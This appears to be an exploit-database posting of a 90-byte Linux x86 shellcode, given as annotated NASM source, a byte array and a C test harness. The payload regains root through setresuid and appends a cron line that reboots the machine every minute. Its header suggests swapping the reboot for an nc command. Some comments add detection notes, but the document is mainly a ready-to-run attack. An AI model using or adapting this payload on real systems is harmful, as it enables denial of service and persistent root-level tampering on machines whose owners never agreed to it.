linux/x86 setreuid(0,0) and add reboot command each minutes in /etc/crontab 90 b
来源:vfocus.net 作者:xertux 发布时间:2010-09-28  
#include <stdio.h>

/*
  * Title : linux x86 shellcode setreuid(0, 0) and add reboot command each minutes in /etc/crontab, 90 bytes
  * Author : xertux
  * Platform: Linux X86
  * Description : setresuid(0, 0, 0) (syscall 0xa4, as in the listing below) + open(/etc/crontab, 0x441, 0x180) + write(fd, * * * * * root reboot\n, 22) + close(fd)
  * Adds a line to /etc/crontab => * * * * * root reboot
  * Reboots the computer every minute => a user does not have time to modify the /etc/crontab file
  * DoS shellcode, but the reboot command can be replaced by an nc command or many other commands...
  * Size : 90 bytes
  * */


/*
; 32-bit NASM source for the byte array that follows this comment.
; Linux i386 int 0x80 convention: eax = syscall number,
; ebx / ecx / edx = first three arguments, result returned in eax.
; No return value is tested anywhere in this listing.
BITS 32

; setresuid(0, 0, 0) -- syscall 164 (0xa4)
xor eax, eax         ; eax = 0
xor ebx, ebx         ; ebx = 0, first argument (ruid)
xor ecx, ecx         ; ecx = 0, second argument (euid)
cdq                  ; edx = 0, third argument (suid): sign-extension of eax, which is 0
mov al, 0xa4         ; eax = 164 = setresuid
int 0x80             ; setresuid(0, 0, 0)

; open("/etc/crontab", 0x441, 0x180) -- syscall 5
push edx             ; four zero bytes: NUL terminator for the path
push 0x6261746e      ; "ntab"
push 0x6f72632f      ; "/cro"
push 0x6374652f      ; "/etc"
mov ebx, esp         ; ebx -> "/etc/crontab"
mov WORD cx, 0x441   ; ecx = O_WRONLY | O_CREAT | O_APPEND (upper half still 0 from the xor above)
mov WORD dx, 0x180   ; edx = 0600 octal = S_IRUSR | S_IWUSR (upper half still 0 from the cdq above)
push BYTE 0x5        ; 5 = open
pop eax              ; eax = 5
int 0x80             ; open("/etc/crontab", O_WRONLY | O_CREAT | O_APPEND, 0600)

; write(fd, "* * * * * root reboot\n", 22) -- syscall 4
mov ebx, eax         ; ebx = value returned by open (the fd on success, a negative errno otherwise)
xor eax, eax         ; eax = 0
push eax             ; four zero bytes after the line (outside the 22 bytes written)
push WORD 0x0a74     ; "t\n" (2-byte push)
push 0x6f6f6265      ; "eboo"
push 0x7220746f      ; "ot r"
push 0x6f72202a      ; "* ro"
push 0x202a202a      ; "* * "
push 0x202a202a      ; "* * "
mov ecx, esp         ; ecx -> "* * * * * root reboot\n"
push BYTE 22         ; 22 = length of the line
pop edx              ; edx = 22
mov al, 0x4          ; eax = 4 = write (upper bytes already cleared by the xor above)
int 0x80             ; write(fd, line, 22)

; close(fd) -- syscall 6
push BYTE 0x6        ; 6 = close
pop eax              ; eax = 6
int 0x80             ; close(fd); ebx still holds the value returned by open
; The listing stops here with no exit or ret, so execution runs on into
; whatever bytes follow the payload; the host process most likely faults
; right after the crontab write (an inference from the listing, not tested).

*/

/*
 * 90-byte Linux i386 payload: the assembled form of the NASM listing in the
 * comment above (int 0x80 syscalls 164, 5, 4, 6 = setresuid, open, write, close).
 *
 * Effect: appends the line "* * * * * root reboot\n" to /etc/crontab, so cron
 * reboots the host every minute. Writing /etc/crontab normally requires root,
 * so the payload only has this effect inside a process that is root or can
 * regain root through setresuid() (e.g. a set-uid root program); running
 * exposed services without that privilege removes the impact.
 *
 * Notes for detection:
 *  - The path and the cron line are operands of push instructions (opcode
 *    0x68, or 0x66 0x68 for the 2-byte push), so they appear in the byte
 *    stream in pieces: "ntab", "/cro", "/etc", then "t\n", "eboo", "ot r",
 *    "* ro", "* * ", "* * ". A contiguous-string match on "/etc/crontab"
 *    does not hit these bytes; the 4-byte pieces do.
 *  - On the host the observable event is an open of /etc/crontab with
 *    O_WRONLY | O_CREAT | O_APPEND followed by one 22-byte write. A
 *    file-integrity or audit watch on writes to /etc/crontab covers it.
 *  - No 0x00 byte occurs in the array, so its C string length equals the
 *    payload length (90).
 */
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x52\x68\x6e\x74\x61"
"\x62\x68\x2f\x63\x72\x6f\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x41"
"\x04\x66\xba\x80\x01\x6a\x05\x58\xcd\x80\x89\xc3\x31\xc0\x50\x66"
"\x68\x74\x0a\x68\x65\x62\x6f\x6f\x68\x6f\x74\x20\x72\x68\x2a\x20"
"\x72\x6f\x68\x2a\x20\x2a\x20\x68\x2a\x20\x2a\x20\x89\xe1\x6a\x16"
"\x5a\xb0\x04\xcd\x80\x6a\x06\x58\xcd\x80";

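/*
 * Test harness: prints the payload length, then calls the bytes in
 * shellcode[] as if they were a function.
 *
 * Returns 0, although the payload as listed contains no ret instruction, so
 * control is not expected to come back to the return statement.
 */
int main(void)
{
    /*
     * The original passed strlen() (undeclared here, since only <stdio.h> is
     * included) to a %d conversion, which mismatches size_t. sizeof minus the
     * literal's terminating NUL gives the same count, because the payload
     * contains no zero byte, and needs no extra header.
     */
    printf("[*] Shellcode - length: %zu\n", sizeof(shellcode) - 1);

    /*
     * Cast the data array to a function pointer and call it. shellcode[] is
     * an ordinary writable array; where data pages are mapped non-executable
     * this call faults instead of running the payload.
     */
    (*(void(*)())shellcode)();
    return 0;
}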

 